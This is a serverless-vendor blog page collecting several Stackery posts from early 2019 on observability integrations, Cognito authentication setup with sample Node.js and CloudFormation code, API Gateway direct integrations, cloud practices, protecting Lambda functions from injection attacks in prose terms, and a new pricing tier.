Stacks on Stacks

The Serverless Ecosystem Blog by Stackery.

Posts on Cloud Infrastructure

Tackle Serverless Observability Challenges with the New Stackery-Epsagon Integration
Sam Goldstein

Sam Goldstein | April 15, 2019

Tackle Serverless Observability Challenges with the New Stackery-Epsagon Integration

Stackery is a tool to deploy complete serverless applications via Amazon Web Services (AWS). Epsagon monitors and tracks your serverless components to increase observability. Here’s how they can not only work together but improve each other.

Let’s start with a scenario: it’s late in the day on Thursday, traffic to your site is way up, and you have reports of problems. The sales and support teams say pages are failing to load, and your page monitoring is showing load times over 20 seconds!

No code was released today, but several teams merged changes over the last week, and you are seeing the highest traffic you’ve had all month.

To make matters worse, not only was code changed this week, but you’re using serverless tools, and the gal who does most of your configuration and deployment in the AWS console left on vacation yesterday. You’re not sure if she or her team changed something but you need to figure it out, stat.

What do you do?

Observability is a Problem for Serverless

For most of the normal operations-headaches like logging, storage, and replicability/expendability, serverless is a breeze. With it, a litany of things is no longer on you once you are paying a platform. But observability can be a problem, and if you’re not using any additional tooling on top of AWS, it can even be a bigger problem with serverless than with traditional virtual machines.

Stackery and Epsagon can vastly increase the observability of your applications, making it much easier to see how your apps are working (or breaking) without having to examine their internal code or add debugging. Stackery has just launched a new integration that makes it easier to add Epsagon in just a few minutes.

How Stackery Makes Epsagon Better

With Epsagon, all you have to do to get detailed performance information on your Lambdas is add a function wrapper to your Lambda code. Couldn’t get much easier than that, right? How about automatically instrumenting all your functions all at once?!

With Stackery’s new “integrations” section, just add your Epsagon token to instrument your Lambdas. After entering the key, your Lambdas will instrument at their next deployment.

One of the biggest benefits of using Stackery with Epsagon is the ability to track all changes to your serverless infrastructure as code changes (tracked by version control).

When you add a new component in Stackery’s canvas, it creates a tracked change in your application’s template file; this uses AWS’s open-source Serverless Application Model or SAM. When you’re looking at your Epsagon dashboard and seeing a problem start at an exact time, you can look at your application’s repository and see everything that changed in your stack.

Need to add a database or change a Lambda’s permissions? This will no longer be a change that happened somewhere at some time in the AWS console but a change tracked just as well as any other code commit.

How Epsagon Makes Stackery Better

Along with tracking invocations and errors, Epsagon can give you great meta-data insights about your serverless environment as a whole.

The dashboard will help you identify functions that should perhaps be cleaned up due to low traffic, and moreover, areas that need attention.

If you notice worrying patterns you can follow the link back to Stackery and see how that Lambda is connected to your other services.

From the Stackery side, you can quickly configure resources and edit your stack configuration.

Try it Yourself

If your team is serious about using serverless to build professional-grade applications, it becomes necessary to use tools on top of AWS to take care of any observability issues. Stackery and Epsagon are strong on their own in respective capacities, but when it comes to upping your serverless observability, they complement one another strongly. Now, it’s easier than ever to use both in harmony.

Want to deploy a serverless app with instrumentation in 10 minutes? To get started you’ll need to sign up with Stackery and create an Epsagon account. After that, check our documentation on using the integration.

Developer's Guide to Cognito with Stackery
Matthew Bradburn

Matthew Bradburn | April 12, 2019

Developer's Guide to Cognito with Stackery

Stackery has a cloud-based app for building and deploying serverless applications, and we use Cognito for our own authentication. This guide will help you set up an authentication back-end for a largely static site.

Cognito is AWS’s cloud solution for authentication – if you’re building an app that handles users with passwords, you can use AWS to handle the tricky high-risk security issues related to storing login credentials. No need to go it alone! Pricing is based on your number of monthly active users, and the first 50k users are free. For apps I’ve worked on, we would have been very pleased to grow out of that free tier. Cognito can also handle social logins, such as “log in with Facebook” and so forth.

One initial barrier to learning Cognito is the number of different architectures and authentication flows that can be implemented. You can use it from a smartphone app or a web app, and you may want to talk to Cognito from the front end as well as the back-end. And security-related APIs tend to be complicated in general.

Ordinarily, you’d do sign-in from a more structured javascript environment like React but in this case, we want to create user accounts from a back-end NodeJS server and we needed to do sign-in from a mostly-static website. This isn’t all that tricky, but the problem with not using React is that a lot of examples aren’t applicable (if you want some great React Tutorials for Cognito, check out serverless-stack’s and Nader Dabit’s on Hackernoon).

Account Creation

User accounts are created programmatically from the API server, which talks to Cognito as an administrator. A user record within your own database needs to be created at that time, so that process needs to be controlled. For security, don’t store user credentials yourself. The Cognito user pool should be configured such that only admins can create users – the users do not sign themselves up directly.

Setting up the Cognito User Pool is easy once you know what to do. The Cognito defaults are good for what we’re doing; although we disable user sign-ups and set “only allow administrators to create users”. We have a single app client, although it’s possible to have more. When we create the app client, we do not ask Cognito to generate a client secret – since we do log in from a web page, there isn’t a good way to keep secrets of this type. We set “enable sign-in API for server-based authentication”, named ADMIN_NO_SRP_AUTH. “SRP” here stands for “Secure Remote Password”, which is a protocol in which a user can be authenticated by a remote server without sending their password over the network. It would be vital for doing authentication over an insecure network, but we don’t need it.

Assuming you’re creating your own similar setup, you’ll need to note your User Pool ID and App Client ID, which are used for every kind of subsequent operation.

Cognito also makes a public key available that is used later to verify that the client has successfully authenticated. Cognito uses RSA, which involves a public/private key pair. The private key is used to sign a content payload, which is given to the client (it’s a JWT, JSON Web Token), and the client gives that JWT to the server in the header of its authenticated requests. Our API server uses the public key to verify that the JWT was signed with the private key.

There are actually multiple public keys involved, but they’re available from Cognito as a JWKS (“JSON Web Key Set”). To retrieve them you have to substitute your region and user pool ID and send a GET to this endpoint:

(https://cognito-idp.{region}.amazonaws.com/{userPoolId}/.well-known/jwks.json)

To get a user account created from the website, we send an unauthenticated POST to our API server’s /accounts endpoint, where the request includes the user’s particulars (name and email address) and plaintext password – so this connection to the API server must obviously be over HTTPS. Our API server creates a user record in our database and uses the key as our own user ID. Then we use the Cognito admin API to create the user.

const AWS = require('aws-sdk');
const cognito = new AWS.CognitoIdentityServiceProvider();

// userId - our user record index key
// email - the new user's email address
// password - the new user's password
function createCognitoUser(userId, email, password) {
  let params = {
    UserPoolId: USER_POOL_ID, // From Cognito dashboard "Pool Id"
    Username: userId,
    MessageAction: 'SUPPRESS', // Do not send welcome email
    TemporaryPassword: password,
    UserAttributes: [
      {
        Name: 'email',
        Value: email
      },
      {
        // Don't verify email addresses
        Name: 'email_verified',
        Value: 'true'
      }
    ]
  };

  return cognito.adminCreateUser(params).promise()
    .then((data) => {
      // We created the user above, but the password is marked as temporary.
      // We need to set the password again. Initiate an auth challenge to get
      // started.
      let params = {
        AuthFlow: 'ADMIN_NO_SRP_AUTH',
        ClientId: USER_POOL_CLIENT_ID, // From Cognito dashboard, generated app client id
        UserPoolId: USER_POOL_ID,
        AuthParameters: {
          USERNAME: userId,
          PASSWORD: password
        }
      };
      return cognito.adminInitiateAuth(params).promise();
    })
    .then((data) => {
      // We now have a proper challenge, set the password permanently.
      let challengeResponseData = {
        USERNAME: userId,
        NEW_PASSWORD: password,
      };

      let params = {
        ChallengeName: 'NEW_PASSWORD_REQUIRED',
        ClientId: USER_POOL_CLIENT_ID,
        UserPoolId: USER_POOL_ID,
        ChallengeResponses: challengeResponseData,
        Session: data.Session
      };
      return cognito.adminRespondToAuthChallenge(params).promise();
    })
    .catch(console.error);
}

Of course, the server needs admin access to the user pool, which can be arranged by putting AWS credentials in environment variables or in a profile accessible to the server.

Cognito wants users to have an initial password that they must change when they first log in. We didn’t want to do it that way, so during the server-side account creation process, while we have the user’s plaintext password, authenticate it and set the user’s desired password as a permanent password at that time. Once that authentication completes, the user password is saved only in encrypted form in Cognito. The authentication process gives us a set of access and refresh tokens as a result, but we don’t need them for anything on the server side.

Client Authentication

When the users later want to authenticate themselves, they do that directly with Cognito from a login web form, which requires no interaction with our API server. Our web page includes the Cognito client SDK bundle. You can read about it on NPM, where there’s a download link:

amazon-cognito-identity

Our web page uses “Use Case 4” described on that page, in which we call Cognito’s authenticateUser() API to get a JWT access token. That JWT is sent to our API server with subsequent requests in the HTTP Authorization header.

Server Verification

The API server needs to verify that the client is actually authenticated, and it does this by decoding the JWT. It has the public key set that we downloaded as above, and we follow the verification process described here:

decode-verify-jwt

One of the items in the JWT payload is the username, which allows us to look up our own user record for the authenticated user.

How Stackery can help

As you continue to build with Cognito, Stackery can help you create complex architectures that your whole team can collaborate on.

Stackery generates CloudFormation templates using a powerful visual canvas and can create both Cognito User Pools and User Pool Clients

alt_text

Stackery also manages your environments and secrets, with easy controls for team permissions.

Tour some of Stackery’s other capabilities in under four minutes with this video:

Stackery Product Features on YouTube

The Future of Serverless is… Functionless?
Chase Douglas

Chase Douglas | April 11, 2019

The Future of Serverless is… Functionless?

I’m in a position where I converse with our customers and cloud service providers, and I keep track of conversations happening through blogs and social media. I then sift through all this data to identify patterns and trends. Lately, I’ve seen some talk about an architectural pattern that I believe will become prevalent in the near future.

I first heard about this pattern a few years ago at a ServerlessConf from a consultant who was helping a “big bank” convert to serverless. They needed to ingest data from an API and put it in a DynamoDB table. The typical way this is implemented looks like this:

Image description

There’s nothing inherently wrong with this approach. It will scale just fine… unless you hit your account-wide Lambda limit. Oh, and you’re also paying for invocations of the Save Record function that isn’t really providing business value intrinsically. Also, we now have added maintenance liability for the code running in Save Record. What if that’s Node.js 6.10, which is approaching EOL for AWS Lambda?

A Functionless Approach

The “big bank” consultant was ahead of the curve and helped them implement a better approach. What if, instead, we could do the following:

Image description

This may seem magical, but it’s possible using advanced mechanisms built into AWS API Gateway. Let’s step back and think about what happens when you integrate an API route with a Lambda Function. We’re used to using frameworks like AWS SAM that abstract away how the integration is implemented under the covers, but in simple terms, the API Gateway Route is set up to make an HTTP request to the AWS Lambda service and wait for the response. Some lightweight transformations are used to enable passing request parameters to the Function and to pass response parts (status code, headers, and body) from the Function response back to the HTTP client.

The same techniques can be used to integrate an API Gateway Route with any other AWS service. API Gateway can handle authentication itself, meaning as long as you can do a small transformation on the incoming API request to generate a request to an AWS service you don’t need a Lambda Function for many API route actions.

While this functionality has been obscured in API Gateway (for a multitude of reasons), it’s front and center in AppSync: AWS’s fully-managed GraphQL service. With AppSync, DynamoDB Tables, SQL Databases (via Aurora Serverless), Lambda Functions, and ElasticSearch domains have all been elevated as first-class “Data Sources” for GraphQL resolvers. Here’s an example API built using these default “Data Sources”:

Image description

This API can query a stock price from a third-party API (Alpha Vantage and record trades in a DynamoDB table, all without needing to write code for, nor provision, Lambda Functions.

What Skills Do Engineers Need For This New Technique?

All this sounds great, but how do you build and operate API-Integration driven applications? Because this is such a new technique, there aren’t a lot of examples to learn from, and the documentation available is mostly of the “reference” variety rather than “how-tos” or “use cases”.

Developers tend to be comfortable with SDK contracts: “When the API route is invoked, my Lambda Function will get this data in JSON, and I can call that AWS service using their SDK with public docs.” Unfortunately, direct integrations are currently a bit more difficult to build.

Engineers need specific new skills and information. In particular how to:

  • Write Apache Velocity macros to translate API requests to AWS service actions. This is a standard mechanism for declaratively transforming HTTP requests in not only AWS API Gateway and AppSync, but many other contexts, including Web Application Firewalls

  • Construct infrastructure templates (e.g. CloudFormation / SAM to integrate API resources with other AWS services (e.g. DynamoDB Tables and Aurora Serverless Databases)

  • “Operate” a functionless, API-integration-driven application (i.e. where are request logs, how are they structured, how will errors be surfaced and acted upon, etc.)

At Stackery, we help our customers figure out the above. If you want to try your hand at this type of development, sign-up for Stackery and don’t be afraid to reach out if you have any questions or need help on your own serverless journey! Drop us a line via email (support@stackery.io), fill out our contact form.

Also, be sure to join the Stackery livestream on this subject on April 24th at 10 AM PDT. I’ll be hosting it, alongside iRobot’s Richard Boyd. We’ll dive a bit deeper on Lambda Functions and REST APIs and answer any questions you might have!

You're Clouding — But are you Clouding Properly?
Abner Germanow

Abner Germanow | April 08, 2019

You're Clouding — But are you Clouding Properly?

If you even partly believe Marc Andreessen’s 2011 “software is eating the world” comment, it stands to reason that companies who are good at software will be the winners in a digital world. Given this, I find it ironic that little large-scale research has gone into what it takes to be good at software. Despite the $6B a year spent on IT research, there is only one research company with a long-term focus on developers (RedMonk) and one research team with a long-term focus on what it takes to successfully run a world-class software organization (DORA). All the other firms are playing catch-up.

If you aren’t familiar with DORA’s work, you should be. Stemming from the State of DevOps research originally sponsored by Puppet Labs in 2014, the annual study quickly grew in sample size, breadth, and a connection to business outcomes by looking at the financial results of public companies. This set of research includes data from both the annual public survey of software teams along with data from a private benchmarking service. It’s fair to say, Dr. Nicole Forsgren, Jez Humble and Co. have successfully collected more data on software team behaviors than anyone else in the world.

Defining proper clouding

Among the headlines of the 2018 study mangled by overly excited people on Twitter was the notion that teams using cloud are 23 times as likely to be elite performers relative to other software teams.

Check out this video where Nicole and Jez troll an auditorium full of software leaders on the truth of that line:

According to the NIST definition that Nicole and Jez rightly subscribe, what is the actual outcome and definition of using cloud well? From an outcomes perspective, you are 23 times more likely to be an elite performing software team if you are using the cloud properly. Which, by the NIST definition, means your use of cloud services should follow this list of attributes:

1. On-demand self-service. Anyone in the organization can self-service the cloud resources they want on demand.

2. Broad network access. Access cloud resources on any device.

3. Resource pooling. Compute resources should be managed efficiently.

4. The appearance of infinite resources. Or as Dr. Forsgen says, “Bursty like magic”

5. Measured services. You only pay for what you use.

Serverless and clouding properly

Everyone wants to be an elite performer, so let’s look at this list through the lens of serverless and Stackery. I’m going to reverse the order because #5 and #4 carry the core definitions of what I mean when I say the word serverless.

5. Measured services: you only get charged for what you use.

Check plus on this one. The number of services now available on a charge-by-use basis is skyrocketing. Serverless databases, API gateways, storage, CDNs, secrets management, GraphQL, data streams, containers, functions, and more. These services represent both a focal point of cloud service provider innovation and undifferentiated burden for most companies. When these services are used as application building blocks, it significantly reduces the amount of code a team needs to write in order to deliver an application into production.

Another often overlooked aspect of these pay-for-use services is that they are configured, connected, and managed with infrastructure as code. Stackery makes the process of composing these services into an application architecture super easy, enabling teams to test and swap out the services best suited to the behaviors of their application.

4. The appearance of infinite resources. “Bursty like magic.”

Again, another check plus. Not only are all those services in the prior section evolving and innovating like mad, but most of them can also automatically burst way past the capabilities of what most enterprise cloud ops teams can support. Most can scale right down to zero, too. The nature of this scaling behavior even shifts how developers prioritize how they write code.

See James Beswick’s take on saving time and money with AWS Lambda using asynchronous programming: Part 1 and Part 2.

3. Resource pooling.

Check plus plus? With serverless, resource pooling isn’t even a thing anymore. When you build apps on foundational building blocks of serverless databases, storage, functions, containers, and whatever else you need, resource pooling is the cloud provider’s problem.

2. Broad network access. Access cloud resources on any device.

Ok, sure. I’ll admit, I think this one is intended to throw a wet blanket on private cloud-ish datacenters where resource access is limited to black Soviet-era laptops. Otherwise, the public cloud, including all the serverless offerings, checks the box on this one.

1. On-demand self-service. Anyone in the organization can self-service the cloud resources they want on demand.

With Stackery? Check plus.

Without Stackery, serverless offerings have made some efforts to solve this problem, but as soon as you add in existing databases or multiple cloud accounts, things get pretty tough to manage as you scale up the number of services and collaborators working on the application.

When building server-centric applications, developers replicate a version of the services running in production on their laptops; databases, storage, streaming, and other dependencies. They then test and iterate on the app until it works on the laptop. When developing serverless apps, that localhost foundation shifts to a cloud services foundation where the application code is still cycled on the developer’s laptop, but the rest of the stack and the app as a whole needs to be tested and iterated cloud-side.

This is the opposite of many organizations, where access to a cloud provider account requires an official act from on high as a remnant from the days when compute resources were really expensive. This is also why developers at those same companies have personal cloud accounts. While I’m sure that’s fine from a security perspective (not), even in companies that provision developer accounts, cloud providers don’t have native ways of managing dev/test/prod environments.

That’s where Stackery comes in to automate the namespacing, versioning, and attributes of every environment. For example, dev and test environments should access test databases while prod should access the production database. Stackery customers embracing serverless development generally provision each developer with two AWS dev environments, and then a set of team dev, test, staging, and production environments across several AWS accounts.

Anyone can become an elite performer

As Dr. Forsgren says, being an elite performer is accessible to all, you just have to execute. With a Stackery and AWS account, your existing IDE, Git Repo, and CI/CD, you too can be on your way to being an elite performer. Get started today.

And make sure you go take the 2019 survey!

Injection Attacks: Protecting Your Serverless Functions
Garrett Gillas

Garrett Gillas | February 28, 2019

Injection Attacks: Protecting Your Serverless Functions

Security is Less of a Problem with Serverless but Still Critical

While trying to verify the claims made on a somewhat facile rundown of serverless security threats, I ran across Jeremy Daly’s excellent writeup of a single vulnerability type in serverless, itself inspired by a fantastic talk from Ory Segal on vulnerabilities in serverless apps. At first I wanted to describe how injection attacks can happen. But the fact is, the two resources I just shared serve as amazing documentation; Ory found examples of these vulnerabilities in active GitHub repos! Instead, it makes more sense to recap their great work before diving into some of the ways that teams can protect themselves.

A Recap on Injection Vulnerability

It might seem like a serverless function just isn’t vulnerable to code injection. After all, it’s just a few lines of code. How much information could you steal from it? How much damage could you possibly do?

The reality is, despite Lambdas running on a highly managed OS layer, that layer still exists and can be manipulated. To put it another way, to be comprehensible and usable to developers of existing web apps, Lambdas need to have the normal abilities of a program running on an OS. Lambdas need to be able to send HTTP requests to arbitrary URLs, so a successful attack will be able to do the same. Lambdas need to be able to load their environment variables, so successful attacks can send all the variables on the stack to an arbitrary URL!

The attack is straightforward enough: inside a user-submitted file name is a string that terminates in an escape-and-terminal command. The careless developer is parsing the files with a terminal command, which results in it being run.

What are the principles at work here?

It’s simple enough to say ‘sanitize your inputs’ but some factors involved here are a bit more complicated than that:

  • Lambdas, no matter how small and simple, can leak useful information
  • There are many sources of events, and almost all of them could include user input
  • With interdependence between serverless resources, user input can come from unexpected angles
  • Alongside many sources of events, event data, and names, information can come in many formats

In case this should seem like a largely theoretical problem, note that Ory’s presentation used examples found in the wild on Github.

Solution 1: Secure Your Functions

On Amazon Web Services (AWS), serverless functions are created with no special abilities within your other AWS resources. You need to give them permissions and connect them up to events from various sources. If your Lambdas need storage, it can be tempting to give them permissions to access your S3 buckets.

In this example from AWS, the permissions given by this policy only cover the two buckets we need for read/write. This is good!

If you’re using lambdas in diverse roles, this means not using single IAM policies for all your lambdas. It’s possible to generalize somewhat and re-use policies, but this takes some monitoring of its own.

How Stackery Can Help

The creation and monitoring of multiple IAM roles for a single stack can get pretty arduous when done manually. I like writing JSON as much as the next person, but multiple permissions can also get tough to manage.

With Stackery, giving functions permissions to access a single bucket or database is as easy as drawing a line.

Even better, the Stackery dashboard makes it easy to see what permissions exist between your resources.

How Twistlock Can Help

Keeping a close eye on your permissions is a great general guideline, but we have to be realistic: dynamic teams need to make large, fast, changes to their stack and mistakes are going to happen. Without some kind of warning that our usual policies have been violated, there’s a good chance that vulnerabilities will go out to production.

Twistlock lets you set overall policies either in sections or system-wide for where traffic should be allowed. It can generate warnings when policies are violated or even block traffic, for example between a lambda that serves public information and a database with Personally Identifiable Information (PII).

Twistlock can also scan memory for suspect strings, meaning that, without any special engineering effort, it can detect when a key is being passed around when it shouldn’t be.

Further Reading

Ory Segal has a blog post on testing for SQL injection in Lambdas using open source tools. Even if you’re not going to roll your own security, it’s a great tour of the nature of the attacks that are possible.

Stackery and Twistlock work great together, in fact, we wrote up a solution brief about it. Serverless architecture is rapidly becoming the best way to roll out powerful, secure applications. Get the full guide here.




Cloud-Side Development For All with Stackery's Free Tier
Nate Taggart

Nate Taggart | February 26, 2019

Cloud-Side Development For All with Stackery's Free Tier

New Pricing & Free Tier

Today, I’m thrilled to announce our new free tier and pricing model for teams adopting modern serverless application development. I believe cloud-side development is the future and I want everyone to experience it at their own pace. We also now offer a model that can scale with either teams or workflows depending on how aggressively you decide to adopt cloud-side development.

How Software Development in the Cloud Has Changed

While we’ve been at this for a while, it’s worth reviewing where development workflows came from and what’s changing.

When “the cloud” first emerged, the prevailing development pattern was to spin up a generic (EC2) server and install software on it to customize its behavior. These customized behaviors might include event streams, data stores, database tables, APIs, or whatever else an application requires. That software, however, is now offered by the cloud providers as a pay-per-use capability that can be configured and requested with infrastructure-as-code (IaC).

Cloud providers have released hundreds of new services which, at their core, are purpose-built, use-case-driven, software-managed services. It’s no longer necessary to spin up a cluster of servers to stand up Kafka if you need a message streaming service, because it’s much faster and arguably cheaper (in terms of people, overhead and maintenance) to simply pull a streaming service like Kinesis or a managed Kafka service off the shelf of the Amazon Web Services menu.

You Can’t Replicate AWS on Your Laptop

The rise of these managed cloud services has fundamentally changed the model for modern application development.

The rise of these managed cloud services has fundamentally changed the model for modern application development.

Of course, the core advantage of this model is that it has become easy to architect at-scale systems in the cloud with very little operational overhead. The consequence of this change, however, is that the software development lifecycle has fundamentally changed. No longer can your laptop act as a development server (localhost). This was a great tool for replicating and testing server-like behavior in local development when the fundamental infrastructural underpinning everything was a server. But now, rather than raw servers, applications are composed of a collection of managed cloud services. Localhost has become a poor representation of the production environment, as it is impossible to replicate all of the functionality of AWS locally on a laptop.

This is driving a shift toward cloud-side development. This doesn’t mean you need to write code through a web browser; your favorite IDE will still work for your application code. But to test and iterate on the full application stack through the development cycle, you must now stand up development instances of the managed services you’re using to compose an application. Crucially, cloud-side development is about service composition: composing your application architecture from off-the-shelf services to accelerate at-scale application development and rapidly iterating on a cloud-native implementation of your application.

What does this tell us? Cloud-side development isn’t just the future, it’s now and it’s big. How big? At re:Invent 2018, AWS executives proclaimed hundreds of thousands of developers are actively developing with AWS’s menu of managed cloud services and Lambda. That’s big.

What tooling does cloud-side development require?

Here is the good news, your IDE, code repository, and CI/CD systems don’t change. What changes? How you manage stacks in the cloud and how you build and iterate stacks with your team.

Stackery now offers easy to consume tooling and environment management capabilities to every organization trying to deliver faster. To build Stackery, we’ve thought about, experienced, and built safeguards around the ways teams could get into trouble composing applications out of managed cloud services. All while keeping every output in standard CloudFormation in case you decide to go back to doing things the hard way.

Managing Active Stacks in the Cloud

Cloud-side development tools must automate and accelerate the iterative nature of development work on top of cloud managed services. This includes rapidly configuring, deploying, sandboxing, namespacing, and managing individual instances of cloud services for each developer involved in the development. At Stackery, we call these active stacks. Cloud-side tools will include automation around packaging and building your code, version controlling your IaC, managing developer environments, instrumentation, governance, and automating the release process across multiple environments and cloud accounts.

Building Stacks

Until recently, cloud-side development of complex applications using managed cloud services was limited to engineers dedicated to cloud innovation (and YAML.) That human investment is still useful but should be applied to setting patterns instead of troubleshooting misplaced characters. Infrastructure as code is the new assembly language. It is machine-readable and unforgiving, which means tooling needs to help developers do things like attaching a handler to a resource in seconds while properly setting all the correct permissions and more. Speaking of resources…

New! Amazon Aurora Serverless and Amazon Cognito

We owe a lot of kudos to our earliest customers who pushed us to add the most popular services needed to visually compose modern applications. Most recently, Amazon Aurora Serverless Database and Amazon Amazon Cognito(user authentication) (user authentication). We’ve also just added the “Anything Resource” that enables our users to add any AWS CloudFormation service beyond the (now 20!!) resource types currently available in the Stackery resource pallet. We like to say it takes a serverless team to keep up with a serverless team.

The Stackery Developer & Teams Plans

And now, with the introduction of our free Developer plan, we’re excited to unleash the possibilities of cloud-side development to everyone who wants to experience the power of the cloud. The Stackery Developer plan includes 6 free active stacks, which is plenty to get a side-project or proof of concept up and running. After you consume the first six stacks or if you want more support or collaborators in the account, additional active stacks can be added for $10 a month per stack. More details here.

Bring your own IDE, Git repository (blank or existing AWS SAM or serverless.yml files), AWS account, and your CI/CD system if you like - Stackery will accelerate you into cloud-development. It’s time to go build.


Further Reading On Cloud-Side Development:


The Anatomy of a Serverless App

We call an application deployed into a cloud service provider an active stack. This stack has three primary components - the functions where the business logic resides, the managed cloud services that serve as the building blocks of the application and then the environmental elements that define the specific dependencies and credentials of for a particular instance of the first two components. This anatomy of a serverless application post goes into the full detail of what serverless teams will build and manage.

Our friends at Lumigo on the need to test cloud-side (and some slower and manual non-Stackery methods for doing so).

Corey Quinn of Last Week in AWS (sign up for the snark, stay for the news, pay for the bill reduction) sparked this conversation on twitter.


Likewise, this “localhost is dead to me” rant by Matt Weagle, organizer of the Seattle Serverless Days, won him a shiny new Stackery account. This thread also garnered some helpful nuance and commentary from Amazon engineers James Hood, Preston Tamkin, and iRobot’s Ben Kehoe.


Creating Cognito User Pools with CloudFormation
Matthew Bradburn

Matthew Bradburn | January 31, 2019

Creating Cognito User Pools with CloudFormation

I’ve been working on creating AWS Cognito User Pools in CloudFormation, and thought this would be a good time to share some of what I’ve learned.

As an overview of this project:

  • For sign-up, I’m creating Cognito users directly from my server app. It’s also possible to have users create their own accounts in Cognito, but that’s not what I want.
  • I want to use email addresses as the user names, rather than having user names with separate associated email addresses.
  • I don’t want the users to have to mess around with temporary passwords. This is part of the ordinary Cognito workflow, but I set the initial password in my server-side code and then immediately reset the password to the same value. So there is a temporary password, but the users don’t notice it.
  • Sign-in is a transaction directly between the client-side app and Cognito; the client gets a JWT (JSON Web Token) from Cognito, which is validated by my AuthenticatedApi function on the back-end.
  • The Cognito User Pool, Lambda functions, etc., are created by CloudFormation with a SAM (Serverless Application Model) template.

Sample Source

The source code for this project is available from my github. The disclaimer is that the source is pretty rough, and should be tidied before being used in production.

Template Generation

I used the Stackery editor to lay out the components and generate a template: stackery editor

The template is available in the Git repo as template.yaml.

This is a simple application; I have an Api Gateway that my client app will hit, with one endpoint to effect sign-up and one to demonstrate an authenticated API. Each of these endpoints invokes a separate Lambda function. Those functions have access to my User Pool.

I’ve wired the User Pool’s triggered functions up just as an experiment. Currently all the triggers invoke my CognitoTriggered function, which is currently logging the input messages but that’s all – according to my understanding, these functions work by modifying the input message and returning it, but my function returns the input message unmolested.

I’ve hand-edited the SAM template to add the user pool client:

  UserPoolClient:
    Type: AWS::Cognito::UserPoolClient
    Properties:
      ClientName: my-app
      GenerateSecret: false
      UserPoolId: !Ref UserPool
      ExplicitAuthFlows:
        - ADMIN_NO_SRP_AUTH

I’ve set GenerateSecret to false because in a web app it’s hard to keep a secret of this type. We use ADMIN_NO_SRP_AUTH during the user creation process as Admin. I’ve also added an environment variable to each of my functions so they’ll get the user pool client ID.

Deployment

Of course Stackery makes it simple to deploy this application into AWS, but it should be pretty easy to give the template directly to CloudFormation. You may want to go through and whack the parameters like ‘StackTagName’ that are added by the Stackery runtime.

Client Tester App

Once you’ve deployed the app, there are a couple of parameters from the running app to be copied to the client. These go in the source code near the top. For instance, the URI of the API Gateway is needed by the client but isn’t availble until after the app is deployed.

This may not be an issue for you if you’re doing a web client app instead of a Node.js app, but in my case I’m using the NPM package named amazon-cognito-identity-js to talk to Cognito for authentication. That package depends on the fetch() API, which browsers have but Node.js does not. I’ve included the package source directly in my repo, and added a use of node-fetch-polyfill in amazon-congnito-identiy-js/lib/Client.js.

Run ./client-app.js --sign-up --email <email> --password <pass> to create a new user in your Cognito pool. In real apps you should never acceppt passwords on the command-line like this.

Once you’ve created a user, run ./client-app.js --sign-in --email <email> --password <pass>, giving it the new user’s email and password, to get a JWT for the user.

Assuming sign-in succeeds, that command prints the JWT created by Cognito. You can then test the authenticated API with ./client-app.js --fetch --token <JWT>.

Areas for Improvement

This is rather marginal sample code, as I mentioned, and there are several obvious areas for improvement:

  • The amazon-cognito-identity-js package isn’t meant for Node.js. I wonder if it makes sense to use the AWS SDK directly.

  • The AuthenticatedApi function gets public keys from Cognito on every request; they should be cached.

  • The client-app uses the access token, but a real client app would have to be prepared to use the refresh token to generate a new access token periodically.

Stackery can make all this a lot easier

We’ve described how to get a user pool up and running, and one way to get access to that user pool within the AWS console. If you’re interested in speedrunning this process, Stackery can make this much much easier for you.

Stackery offers a visual tool that lets you plan a new stack with just a few clicks. Connecting resources like your Cognito User Pool and User Pool Client are as simple as drawing a line.

And once you’re happy with your configuration Stackery can push it to AWS; automatically creating the Serverless Application Model (SAM) template based on your diagram.

Stackery makes it much easier to build and deploy stacks of serverless resources, and there’s a free tier with a complete suite of tools available now.

The Journey to Serverless: How Did We Get Here? [Infographic]
Gracie Gregory

Gracie Gregory | January 08, 2019

The Journey to Serverless: How Did We Get Here? [Infographic]

It’s the beginning of a new year and when it comes to computing, going serverless is the resolution of many engineering teams. At Stackery, this excites us because we know how significant the positive impacts of serverless are and will be. So much, in fact, that we’re already thinking about its applications for next year and beyond.

But while Stackery is toasting to serverless just as much as the headlines are, it’s crucial at this juncture to ensure that there is a wider foundational understanding. Our team is thrilled that so many others are anxious to rethink how they approach computing, save money with a pay-per-use model, and build without limits using serverless. However, we’re also proponents of knowing your serverless strategy inside and out, thereby having an airtight business use-case that anyone on the team can explain. After all, serverless didn’t rise to the top of Gartner’s top 10 infrastructure and operations trends overnight; its (figurative) source code was being drafted decades ago and this is why it’s much more than a trend. Just as we learned in history class, what’s past is prologue; the developments of yesteryear are the stage directions for today’s innovation. In other words, understanding the origins of serverless will give you a competitive advantage.

So, how exactly did we get to the edge of widespread serverless adoption? What historical developments make all of this more than a temporary buzzword? Why have the conversations about serverless been growing among your peers and leadership team, not dying down? To answer these questions, let’s interrupt our regularly-scheduled New Year celebrations with a trip back in time to 1995…

At Stackery, we’re helping engineering teams build amazing serverless applications with limitless scalability. The best part? The stage for the next decade of software development is being set now. Join us in shaping serverless computing for the next generation. Get started with Stackery today.

Get the Serverless Development Toolkit for Teams

now and get started for free. Contact one of our product experts to get started building amazing serverless applications today.

To Top